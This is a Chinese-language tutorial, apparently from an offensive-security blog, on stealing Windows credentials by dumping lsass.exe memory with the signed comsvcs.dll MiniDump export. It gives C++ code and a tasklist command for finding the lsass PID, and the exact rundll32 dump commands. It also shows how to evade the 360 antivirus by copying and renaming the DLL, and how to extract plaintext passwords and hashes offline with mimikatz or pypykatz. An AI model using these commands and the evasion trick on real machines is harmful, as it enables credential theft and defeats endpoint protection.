簡介
comsvcs.dll 是 Windows 自帶的系統 DLL（位於 System32，微軟簽名），其導出函數 MiniDumpW 本來用於在程序崩潰時把進程內存轉儲成文件。通過 rundll32 調用時函數名寫作 MiniDump 即可——rundll32 找不到同名導出時會自動嘗試加 W 後綴的版本。
實際使用
獲取 PID 可以調 API 枚舉進程，也可以直接看進程列表；MiniDump 的第一個參數就是 lsass.exe 的 PID。
注意：轉儲 lsass 需要 SeDebugPrivilege（管理員或 SYSTEM 上下文），否則 MiniDump 會因打不開 lsass 進程而失敗；開啟了 RunAsPPL / Credential Guard 的機器上這條路一般也走不通。
#include<Windows.h>
#include<Tlhelp32.h>
#include<stdio.h>
#include <iostream>
using namespace std;
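// Locate lsass.exe through a Toolhelp process snapshot and print its PID.
//
// Returns the PID of the first process whose image name is "lsass.exe"
// (case-insensitive), or 0 if the snapshot could not be taken or no such
// process was listed.
//
// Fixes vs. the original: the entry returned by Process32First is now
// examined as well; the loop stops when Process32Next runs out of entries
// instead of spinning forever on a stale entry; the snapshot handle is
// closed on every path; the PID is returned instead of a constant 0.
//
// Enumerating the process list needs no special privilege, but actually
// opening lsass (which the MiniDump step later does) requires
// SeDebugPrivilege / an elevated context.
int getpid() {
    DWORD lsassPID = 0;

    HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapShot == INVALID_HANDLE_VALUE) {
        std::wcout << "[-] CreateToolhelp32Snapshot failed: " << GetLastError() << std::endl;
        return 0;
    }

    PROCESSENTRY32 processEntry{};
    processEntry.dwSize = sizeof(PROCESSENTRY32);  // required by the API before the first call

    // Walk every entry (including the first one) and stop at end of list.
    for (BOOL ok = Process32First(hSnapShot, &processEntry); ok;
         ok = Process32Next(hSnapShot, &processEntry)) {
        // szExeFile is a wide string here, i.e. this assumes a UNICODE build.
        if (_wcsicmp(processEntry.szExeFile, L"lsass.exe") == 0) {
            lsassPID = processEntry.th32ProcessID;
            break;
        }
    }

    CloseHandle(hSnapShot);

    if (lsassPID != 0) {
        std::wcout << "[+] Got lsass.exe PID: " << lsassPID << std::endl;
    } else {
        std::wcout << "[-] lsass.exe not found" << std::endl;
    }
    return static_cast<int>(lsassPID);
}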
// Entry point: resolve and print the lsass.exe PID, then exit.
int main() {
    (void)getpid();  // result is printed by getpid itself; exit status is not used
    return 0;
}
用 tasklist 也能拿到 PID（輸出的第二列就是 PID）：
tasklist | findstr lsass.exe
在裝有 360 的機器上直接這樣調用會被攔截（同樣的環境下火絨沒有反應）：
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 508 lsass.dmp full
繞過思路：把 comsvcs.dll 拷貝一份換個名字再調用，360 就不攔了。從現象推測它攔的是「rundll32 加載 System32\comsvcs.dll 並調用 MiniDump」這條路徑/命令行特徵，而不是對 lsass 的內存讀取本身；基於 lsass 句柄訪問的檢測（例如 Sysmon Event ID 10、EDR 對 OpenProcess lsass 的監控）仍然會看到這次轉儲，rundll32 的命令行也照樣會被記錄。
copy C:\windows\System32\comsvcs.dll yyyang.dll
rundll32.exe yyyang.dll, MiniDump 508 lsass.dmp full
生成的 lsass.dmp 拿回本機用 mimikatz 的 sekurlsa::minidump 或 pypykatz 離線解析即可。注意 dmp 文件裡含有明文憑據和哈希，落在目標磁盤上就是現成的證據和泄露源，取回後應立即刪除。